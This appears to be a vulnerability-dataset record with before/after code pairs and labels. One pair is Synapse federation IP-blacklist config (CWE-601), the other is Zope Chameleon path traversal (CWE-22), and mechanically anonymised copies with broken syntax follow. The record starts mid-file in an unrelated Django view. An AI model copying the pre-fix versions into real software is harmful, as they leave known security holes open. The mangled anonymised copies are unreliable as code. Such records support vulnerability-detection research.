self.build_form() # and it's not a bad idea to rebuild the form
return super(CLASS_0, self).get(VAR_5, *VAR_6, **VAR_4)
if VAR_5.POST.get("save") and self.form and self.form.is_valid():
self.form.save()
self.save_layout()
self.build_form()
if VAR_5.POST.get("publish") == "1":
return self.dispatch_publish()
return self.get(VAR_5, *VAR_6, **VAR_4)
def FUNC_4(self):
VAR_17 = get_theme_by_identifier(self.request.GET["theme"], self.request.shop)
if not VAR_17:
raise Problem(_("Unable to determine the current VAR_17."))
VAR_18 = self.request.GET["view"]
VAR_19 = self.request.GET.get("global_type", None)
self.view_config = ViewConfig(
VAR_17=theme,
shop=self.request.shop,
VAR_18=view_name,
draft=True,
VAR_19=global_type,
)
self.layout_data_key = self.request.GET.get("layout_data_key", None)
VAR_20 = self.request.GET.get("layout_identifier", None)
VAR_21 = Layout
for provided_layout in get_provided_layouts():
if provided_layout.identifier == VAR_20:
VAR_21 = provided_layout
self.placeholder_name = self.request.GET["ph"]
self.default_layout = self._get_default_layout()
self.layout = self.view_config.get_placeholder_layout(
VAR_21=layout_cls,
placeholder_name=self.placeholder_name,
default_layout=self.default_layout,
layout_data_key=self.layout_data_key,
)
(VAR_13, VAR_8) = self.current_cell_coords = (
int(self.request.GET.get("x", -1)),
int(self.request.GET.get("y", -1)),
)
self.current_cell = self.layout.get_cell(VAR_13=x, VAR_8=y)
self.build_form()
def FUNC_5(self):
if not self.current_cell:
self.form = None
return
VAR_4 = {"layout_cell": self.current_cell, "theme": self.view_config.theme, "request": self.request}
if self.request.method == "POST":
VAR_4["data"] = self.request.POST
VAR_4["files"] = self.request.FILES
self.form = LayoutCellFormGroup(**VAR_4)
def FUNC_6(self, VAR_7=None):
self.view_config.save_placeholder_layout(layout_data_key=self.layout_data_key, VAR_7=(layout or self.layout))
self.changed = True
def FUNC_7(self, VAR_8, **VAR_4):
VAR_8 = int(VAR_8)
if len(self.layout.rows[VAR_8].cells) >= VAR_0:
raise ValueError(_("Can't add more than %d cells in one VAR_22.") % VAR_0)
if not (0 <= VAR_8 < len(self.layout.rows)):
return
self.layout.rows[VAR_8].add_cell()
self.save_layout()
def FUNC_8(self, VAR_8=None, **VAR_4):
VAR_22 = self.layout.insert_row(VAR_8)
VAR_22.add_cell() # For convenience, add a cell to the VAR_22.
self.save_layout()
def FUNC_9(self, VAR_8, **VAR_4):
self.layout.delete_row(VAR_8)
self.save_layout()
def FUNC_10(self, VAR_9, VAR_10, **VAR_4):
self.layout.move_row_to_index(VAR_9, VAR_10)
self.save_layout()
def FUNC_11(self, VAR_11, VAR_9, VAR_12, VAR_10, **VAR_4):
self.layout.move_cell_to_position(VAR_11, VAR_9, VAR_12, VAR_10)
self.save_layout()
def FUNC_12(self, VAR_13, VAR_8, **VAR_4):
self.layout.delete_cell(VAR_13, VAR_8)
self.save_layout()
def FUNC_13(self, VAR_14="", **VAR_4):
if self.current_cell:
if not VAR_14:
plugin = None
self.current_cell.plugin_identifier = VAR_14
self.save_layout()
def FUNC_14(self, **VAR_4):
self.view_config.publish()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Published"))
def FUNC_15(self, **VAR_4):
self.view_config.revert()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Reverted"))
| [
1,
2,
3,
4,
5,
6,
7,
14,
23,
24,
25,
27,
28,
33,
39,
44,
51,
58,
64,
67,
81,
85,
86,
87,
89,
92,
94,
108,
109,
111,
112,
113,
119,
134,
144,
148,
153,
155,
156,
160,
165,
169,
173,
177,
181,
188,
192,
196
] | [
1,
2,
3,
4,
5,
6,
7,
15,
24,
25,
26,
28,
29,
34,
40,
45,
52,
59,
65,
68,
82,
86,
87,
88,
90,
93,
95,
109,
110,
112,
113,
114,
120,
135,
145,
149,
154,
156,
157,
161,
166,
170,
174,
178,
182,
189,
193,
197
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from netaddr import IPSet
from synapse.config._base import Config, ConfigError
from synapse.config._util import validate_config
class FederationConfig(Config):
section = "federation"
def read_config(self, config, **kwargs):
# FIXME: federation_domain_whitelist needs sytests
self.federation_domain_whitelist = None # type: Optional[dict]
federation_domain_whitelist = config.get("federation_domain_whitelist", None)
if federation_domain_whitelist is not None:
# turn the whitelist into a hash for speed of lookup
self.federation_domain_whitelist = {}
for domain in federation_domain_whitelist:
self.federation_domain_whitelist[domain] = True
self.federation_ip_range_blacklist = config.get(
"federation_ip_range_blacklist", []
)
# Attempt to create an IPSet from the given ranges
try:
self.federation_ip_range_blacklist = IPSet(
self.federation_ip_range_blacklist
)
# Always blacklist 0.0.0.0, ::
self.federation_ip_range_blacklist.update(["0.0.0.0", "::"])
except Exception as e:
raise ConfigError(
"Invalid range(s) provided in federation_ip_range_blacklist: %s" % e
)
federation_metrics_domains = config.get("federation_metrics_domains") or []
validate_config(
_METRICS_FOR_DOMAINS_SCHEMA,
federation_metrics_domains,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(federation_metrics_domains)
def generate_config_section(self, config_dir_path, server_name, **kwargs):
return """\
## Federation ##
# Restrict federation to the following whitelist of domains.
# N.B. we recommend also firewalling your federation listener to limit
# inbound federation traffic as early as possible, rather than relying
# purely on this application-layer restriction. If not specified, the
# default is to whitelist everything.
#
#federation_domain_whitelist:
# - lon.example.com
# - nyc.example.com
# - syd.example.com
# Prevent federation requests from being sent to the following
# blacklist IP address CIDR ranges. If this option is not specified, or
# specified with an empty list, no ip range blacklist will be enforced.
#
# As of Synapse v1.4.0 this option also affects any outbound requests to identity
# servers provided by user input.
#
# (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly
# listed here, since they correspond to unroutable addresses.)
#
federation_ip_range_blacklist:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '100.64.0.0/10'
- '169.254.0.0/16'
- '::1/128'
- 'fe80::/64'
- 'fc00::/7'
# Report prometheus metrics on the age of PDUs being sent to and received from
# the following domains. This can be used to give an idea of "delay" on inbound
# and outbound federation, though be aware that any delay can be due to problems
# at either end or with the intermediate network.
#
# By default, no domains are monitored in this way.
#
#federation_metrics_domains:
# - matrix.org
# - example.com
"""
_METRICS_FOR_DOMAINS_SCHEMA = {"type": "array", "items": {"type": "string"}}
| # -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from netaddr import IPSet
from synapse.config._base import Config, ConfigError
from synapse.config._util import validate_config
class FederationConfig(Config):
section = "federation"
def read_config(self, config, **kwargs):
# FIXME: federation_domain_whitelist needs sytests
self.federation_domain_whitelist = None # type: Optional[dict]
federation_domain_whitelist = config.get("federation_domain_whitelist", None)
if federation_domain_whitelist is not None:
# turn the whitelist into a hash for speed of lookup
self.federation_domain_whitelist = {}
for domain in federation_domain_whitelist:
self.federation_domain_whitelist[domain] = True
ip_range_blacklist = config.get("ip_range_blacklist", [])
# Attempt to create an IPSet from the given ranges
try:
self.ip_range_blacklist = IPSet(ip_range_blacklist)
except Exception as e:
raise ConfigError("Invalid range(s) provided in ip_range_blacklist: %s" % e)
# Always blacklist 0.0.0.0, ::
self.ip_range_blacklist.update(["0.0.0.0", "::"])
# The federation_ip_range_blacklist is used for backwards-compatibility
# and only applies to federation and identity servers. If it is not given,
# default to ip_range_blacklist.
federation_ip_range_blacklist = config.get(
"federation_ip_range_blacklist", ip_range_blacklist
)
try:
self.federation_ip_range_blacklist = IPSet(federation_ip_range_blacklist)
except Exception as e:
raise ConfigError(
"Invalid range(s) provided in federation_ip_range_blacklist: %s" % e
)
# Always blacklist 0.0.0.0, ::
self.federation_ip_range_blacklist.update(["0.0.0.0", "::"])
federation_metrics_domains = config.get("federation_metrics_domains") or []
validate_config(
_METRICS_FOR_DOMAINS_SCHEMA,
federation_metrics_domains,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(federation_metrics_domains)
def generate_config_section(self, config_dir_path, server_name, **kwargs):
return """\
## Federation ##
# Restrict federation to the following whitelist of domains.
# N.B. we recommend also firewalling your federation listener to limit
# inbound federation traffic as early as possible, rather than relying
# purely on this application-layer restriction. If not specified, the
# default is to whitelist everything.
#
#federation_domain_whitelist:
# - lon.example.com
# - nyc.example.com
# - syd.example.com
# Prevent outgoing requests from being sent to the following blacklisted IP address
# CIDR ranges. If this option is not specified, or specified with an empty list,
# no IP range blacklist will be enforced.
#
# The blacklist applies to the outbound requests for federation, identity servers,
# push servers, and for checking key validitity for third-party invite events.
#
# (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly
# listed here, since they correspond to unroutable addresses.)
#
# This option replaces federation_ip_range_blacklist in Synapse v1.24.0.
#
ip_range_blacklist:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '100.64.0.0/10'
- '169.254.0.0/16'
- '::1/128'
- 'fe80::/64'
- 'fc00::/7'
# Report prometheus metrics on the age of PDUs being sent to and received from
# the following domains. This can be used to give an idea of "delay" on inbound
# and outbound federation, though be aware that any delay can be due to problems
# at either end or with the intermediate network.
#
# By default, no domains are monitored in this way.
#
#federation_metrics_domains:
# - matrix.org
# - example.com
"""
_METRICS_FOR_DOMAINS_SCHEMA = {"type": "array", "items": {"type": "string"}}
| open_redirect | {
"code": [
" self.federation_ip_range_blacklist = config.get(",
" \"federation_ip_range_blacklist\", []",
" )",
" self.federation_ip_range_blacklist = IPSet(",
" self.federation_ip_range_blacklist",
" )",
" self.federation_ip_range_blacklist.update([\"0.0.0.0\", \"::\"])",
" federation_ip_range_blacklist:"
],
"line_no": [
39,
40,
41,
45,
46,
47,
50,
89
]
} | {
"code": [
" ip_range_blacklist = config.get(\"ip_range_blacklist\", [])",
" except Exception as e:",
" raise ConfigError(\"Invalid range(s) provided in ip_range_blacklist: %s\" % e)",
" self.ip_range_blacklist.update([\"0.0.0.0\", \"::\"])",
" federation_ip_range_blacklist = config.get(",
" \"federation_ip_range_blacklist\", ip_range_blacklist",
" )",
" self.federation_ip_range_blacklist = IPSet(federation_ip_range_blacklist)",
" self.federation_ip_range_blacklist.update([\"0.0.0.0\", \"::\"])"
],
"line_no": [
39,
44,
45,
47,
52,
53,
54,
56,
62
]
} |
from typing import Optional
from netaddr import IPSet
from synapse.config._base import Config, ConfigError
from synapse.config._util import validate_config
class CLASS_0(Config):
VAR_1 = "federation"
def FUNC_0(self, VAR_2, **VAR_3):
self.federation_domain_whitelist = None # type: Optional[dict]
VAR_6 = VAR_2.get("federation_domain_whitelist", None)
if VAR_6 is not None:
self.federation_domain_whitelist = {}
for VAR_8 in VAR_6:
self.federation_domain_whitelist[VAR_8] = True
self.federation_ip_range_blacklist = VAR_2.get(
"federation_ip_range_blacklist", []
)
try:
self.federation_ip_range_blacklist = IPSet(
self.federation_ip_range_blacklist
)
self.federation_ip_range_blacklist.update(["0.0.0.0", "::"])
except Exception as e:
raise ConfigError(
"Invalid range(s) provided in federation_ip_range_blacklist: %s" % e
)
VAR_7 = VAR_2.get("federation_metrics_domains") or []
validate_config(
VAR_0,
VAR_7,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(VAR_7)
def FUNC_1(self, VAR_4, VAR_5, **VAR_3):
return """\
federation_ip_range_blacklist:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '100.64.0.0/10'
- '169.254.0.0/16'
- '::1/128'
- 'fe80::/64'
- 'fc00::/7'
"""
VAR_0 = {"type": "array", "items": {"type": "string"}}
|
from typing import Optional
from netaddr import IPSet
from synapse.config._base import Config, ConfigError
from synapse.config._util import validate_config
class CLASS_0(Config):
VAR_1 = "federation"
def FUNC_0(self, VAR_2, **VAR_3):
self.federation_domain_whitelist = None # type: Optional[dict]
VAR_6 = VAR_2.get("federation_domain_whitelist", None)
if VAR_6 is not None:
self.federation_domain_whitelist = {}
for VAR_10 in VAR_6:
self.federation_domain_whitelist[VAR_10] = True
VAR_7 = VAR_2.get("ip_range_blacklist", [])
try:
self.ip_range_blacklist = IPSet(VAR_7)
except Exception as e:
raise ConfigError("Invalid range(s) provided in VAR_7: %s" % e)
self.ip_range_blacklist.update(["0.0.0.0", "::"])
VAR_8 = VAR_2.get(
"federation_ip_range_blacklist", VAR_7
)
try:
self.federation_ip_range_blacklist = IPSet(VAR_8)
except Exception as e:
raise ConfigError(
"Invalid range(s) provided in VAR_8: %s" % e
)
self.federation_ip_range_blacklist.update(["0.0.0.0", "::"])
VAR_9 = VAR_2.get("federation_metrics_domains") or []
validate_config(
VAR_0,
VAR_9,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(VAR_9)
def FUNC_1(self, VAR_4, VAR_5, **VAR_3):
return """\
VAR_7:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '100.64.0.0/10'
- '169.254.0.0/16'
- '::1/128'
- 'fe80::/64'
- 'fc00::/7'
"""
VAR_0 = {"type": "array", "items": {"type": "string"}}
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
19,
22,
23,
26,
28,
31,
33,
35,
38,
42,
43,
48,
49,
55,
63,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
81,
82,
83,
84,
85,
86,
87,
88,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
111,
112,
114
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
19,
22,
23,
26,
28,
31,
33,
35,
38,
40,
41,
46,
48,
49,
50,
51,
61,
63,
71,
74,
75,
76,
77,
78,
79,
80,
81,
82,
83,
84,
85,
86,
87,
88,
89,
90,
91,
92,
93,
94,
95,
96,
97,
98,
109,
110,
111,
112,
113,
114,
115,
116,
117,
118,
119,
121,
122,
124
] |
0CWE-22
| """``chameleon.tales`` expressions."""
from ast import NodeTransformer
from ast import parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
_marker = object()
zope2_exceptions = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def static(obj):
return Static(template("obj", obj=Symbol(obj), mode="eval"))
class BoboAwareZopeTraverse:
traverse_method = 'restrictedTraverse'
__slots__ = ()
@classmethod
def traverse(cls, base, request, path_items):
"""See ``zope.app.pagetemplate.engine``."""
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if ITraversable.providedBy(base):
base = getattr(base, cls.traverseMethod)(name)
else:
base = traversePathElement(base, name, path_items,
request=request)
return base
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
if path_items:
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
callable(base):
base = render(base, econtext)
return base
class TrustedBoboAwareZopeTraverse(BoboAwareZopeTraverse):
traverse_method = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
isinstance(base, type):
return base()
return base
class PathExpr(expressions.PathExpr):
exceptions = zope2_exceptions
traverser = Static(template(
"cls()", cls=Symbol(BoboAwareZopeTraverse), mode="eval"
))
class TrustedPathExpr(PathExpr):
traverser = Static(template(
"cls()", cls=Symbol(TrustedBoboAwareZopeTraverse), mode="eval"
))
class NocallExpr(expressions.NocallExpr, PathExpr):
pass
class ExistsExpr(expressions.ExistsExpr):
exceptions = zope2_exceptions
class RestrictionTransform(NodeTransformer):
secured = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def visit_Name(self, node):
value = self.secured.get(node.id)
if value is not None:
return Symbol(value)
return node
class UntrustedPythonExpr(expressions.PythonExpr):
restricted_python_transformer = RestrictingNodeTransformer()
page_templates_expression_transformer = RestrictionTransform()
# Make copy of parent expression builtins
builtins = expressions.PythonExpr.builtins.copy()
# Update builtins with Restricted Python utility builtins
builtins.update({
name: static(builtin) for (name, builtin) in utility_builtins.items()
})
def parse(self, string):
encoded = string.encode('utf-8')
node = parse(encoded, mode='eval')
# Run Node Transformation from RestrictedPython:
self.restricted_python_transformer.visit(node)
# Run PageTemplate.expression RestrictedPython Transform:
self.page_templates_expression_transformer.visit(node)
return node
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ChameleonEngine(ExpressionEngine):
"""Expression engine for ``chameleon.tales``.
Only partially implemented: its ``compile`` is currently unusable
"""
def compile(self, expression):
raise NotImplementedError()
types = dict(
python=UntrustedPythonExpr,
string=StringExpr,
not_=NotExpr,
exists=ExistsExpr,
path=PathExpr,
provider=expressions.ProviderExpr,
nocall=NocallExpr)
def createChameleonEngine(types=types, untrusted=True, **overrides):
e = ChameleonEngine()
def norm(k):
return k[:-1] if k.endswith("_") else k
e.untrusted = untrusted
ts = e.types
for k, v in types.items():
k = norm(k)
e.registerType(k, v)
for k, v in overrides.items():
k = norm(k)
if k in ts:
del ts[k]
e.registerType(k, v)
return e
def createTrustedChameleonEngine(**overrides):
ovr = dict(python=expressions.PythonExpr, path=TrustedPathExpr)
ovr.update(overrides)
return createChameleonEngine(untrusted=False, **ovr)
_engine = createChameleonEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedChameleonEngine()
def getTrustedEngine():
return _trusted_engine
| """``chameleon.tales`` expressions."""
import warnings
from ast import NodeTransformer
from ast import parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
_marker = object()
zope2_exceptions = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def static(obj):
return Static(template("obj", obj=Symbol(obj), mode="eval"))
class BoboAwareZopeTraverse:
traverse_method = 'restrictedTraverse'
__slots__ = ()
@classmethod
def traverse(cls, base, request, path_items):
"""See ``zope.app.pagetemplate.engine``."""
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if name == '_':
warnings.warn('Traversing to the name `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif name.startswith('_'):
raise NotFound(name)
if ITraversable.providedBy(base):
base = getattr(base, cls.traverse_method)(name)
else:
base = traversePathElement(base, name, path_items,
request=request)
return base
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
if path_items:
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
callable(base):
base = render(base, econtext)
return base
class TrustedBoboAwareZopeTraverse(BoboAwareZopeTraverse):
traverse_method = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
isinstance(base, type):
return base()
return base
class PathExpr(expressions.PathExpr):
exceptions = zope2_exceptions
traverser = Static(template(
"cls()", cls=Symbol(BoboAwareZopeTraverse), mode="eval"
))
class TrustedPathExpr(PathExpr):
traverser = Static(template(
"cls()", cls=Symbol(TrustedBoboAwareZopeTraverse), mode="eval"
))
class NocallExpr(expressions.NocallExpr, PathExpr):
pass
class ExistsExpr(expressions.ExistsExpr):
exceptions = zope2_exceptions
class RestrictionTransform(NodeTransformer):
secured = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def visit_Name(self, node):
value = self.secured.get(node.id)
if value is not None:
return Symbol(value)
return node
class UntrustedPythonExpr(expressions.PythonExpr):
restricted_python_transformer = RestrictingNodeTransformer()
page_templates_expression_transformer = RestrictionTransform()
# Make copy of parent expression builtins
builtins = expressions.PythonExpr.builtins.copy()
# Update builtins with Restricted Python utility builtins
builtins.update({
name: static(builtin) for (name, builtin) in utility_builtins.items()
})
def parse(self, string):
encoded = string.encode('utf-8')
node = parse(encoded, mode='eval')
# Run Node Transformation from RestrictedPython:
self.restricted_python_transformer.visit(node)
# Run PageTemplate.expression RestrictedPython Transform:
self.page_templates_expression_transformer.visit(node)
return node
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ChameleonEngine(ExpressionEngine):
"""Expression engine for ``chameleon.tales``.
Only partially implemented: its ``compile`` is currently unusable
"""
def compile(self, expression):
raise NotImplementedError()
types = dict(
python=UntrustedPythonExpr,
string=StringExpr,
not_=NotExpr,
exists=ExistsExpr,
path=PathExpr,
provider=expressions.ProviderExpr,
nocall=NocallExpr)
def createChameleonEngine(types=types, untrusted=True, **overrides):
e = ChameleonEngine()
def norm(k):
return k[:-1] if k.endswith("_") else k
e.untrusted = untrusted
ts = e.types
for k, v in types.items():
k = norm(k)
e.registerType(k, v)
for k, v in overrides.items():
k = norm(k)
if k in ts:
del ts[k]
e.registerType(k, v)
return e
def createTrustedChameleonEngine(**overrides):
ovr = dict(python=expressions.PythonExpr, path=TrustedPathExpr)
ovr.update(overrides)
return createChameleonEngine(untrusted=False, **ovr)
_engine = createChameleonEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedChameleonEngine()
def getTrustedEngine():
return _trusted_engine
| path_disclosure | {
"code": [
" base = getattr(base, cls.traverseMethod)(name)"
],
"line_no": [
65
]
} | {
"code": [
"import warnings",
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" 'and will be removed in Zope 6.',",
" elif name.startswith('_'):",
" base = getattr(base, cls.traverse_method)(name)"
],
"line_no": [
3,
66,
67,
68,
70,
74
]
} |
from ast import NodeTransformer
from ast import .parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import .expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
VAR_0 = object()
VAR_1 = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def FUNC_0(VAR_2):
return Static(template("obj", VAR_2=Symbol(VAR_2), mode="eval"))
class CLASS_0:
VAR_8 = 'restrictedTraverse'
__slots__ = ()
@classmethod
def FUNC_5(VAR_9, VAR_10, VAR_11, VAR_12):
VAR_12 = list(VAR_12)
path_items.reverse()
while VAR_12:
VAR_30 = VAR_12.pop()
if ITraversable.providedBy(VAR_10):
VAR_10 = getattr(VAR_10, VAR_9.traverseMethod)(VAR_30)
else:
VAR_10 = traversePathElement(VAR_10, VAR_30, VAR_12,
VAR_11=request)
return VAR_10
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
if VAR_12:
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
callable(VAR_10):
VAR_10 = render(VAR_10, VAR_13)
return VAR_10
class CLASS_1(CLASS_0):
VAR_8 = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
isinstance(VAR_10, type):
return VAR_10()
return VAR_10
class CLASS_2(expressions.PathExpr):
VAR_15 = VAR_1
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_0), mode="eval"
))
class CLASS_3(CLASS_2):
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_1), mode="eval"
))
class CLASS_4(expressions.NocallExpr, CLASS_2):
pass
class CLASS_5(expressions.ExistsExpr):
VAR_15 = VAR_1
class CLASS_6(NodeTransformer):
VAR_17 = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def FUNC_6(self, VAR_18):
VAR_28 = self.secured.get(VAR_18.id)
if VAR_28 is not None:
return Symbol(VAR_28)
return VAR_18
class CLASS_7(expressions.PythonExpr):
VAR_19 = RestrictingNodeTransformer()
VAR_20 = CLASS_6()
VAR_21 = expressions.PythonExpr.builtins.copy()
builtins.update({
VAR_30: FUNC_0(builtin) for (VAR_30, builtin) in utility_builtins.items()
})
def FUNC_7(self, VAR_22):
VAR_29 = VAR_22.encode('utf-8')
VAR_18 = FUNC_7(VAR_29, mode='eval')
self.restricted_python_transformer.visit(VAR_18)
self.page_templates_expression_transformer.visit(VAR_18)
return VAR_18
@implementer(IZopeAwareEngine)
class CLASS_8(ExpressionEngine):
def FUNC_8(self, VAR_23):
raise NotImplementedError()
VAR_3 = dict(
python=CLASS_7,
VAR_22=StringExpr,
not_=NotExpr,
exists=CLASS_5,
path=CLASS_2,
provider=expressions.ProviderExpr,
nocall=CLASS_4)
def FUNC_1(VAR_3=types, VAR_4=True, **VAR_5):
VAR_24 = CLASS_8()
def FUNC_9(VAR_25):
return VAR_25[:-1] if VAR_25.endswith("_") else VAR_25
VAR_24.untrusted = VAR_4
VAR_26 = VAR_24.types
for VAR_25, v in VAR_3.items():
VAR_25 = FUNC_9(VAR_25)
VAR_24.registerType(VAR_25, v)
for VAR_25, v in VAR_5.items():
VAR_25 = FUNC_9(VAR_25)
if VAR_25 in VAR_26:
del VAR_26[VAR_25]
VAR_24.registerType(VAR_25, v)
return VAR_24
def FUNC_2(**VAR_5):
VAR_27 = dict(python=expressions.PythonExpr, path=CLASS_3)
VAR_27.update(VAR_5)
return FUNC_1(VAR_4=False, **VAR_27)
VAR_6 = FUNC_1()
def FUNC_3():
return VAR_6
VAR_7 = FUNC_2()
def FUNC_4():
return VAR_7
|
import warnings
from ast import NodeTransformer
from ast import .parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import .expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
VAR_0 = object()
VAR_1 = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def FUNC_0(VAR_2):
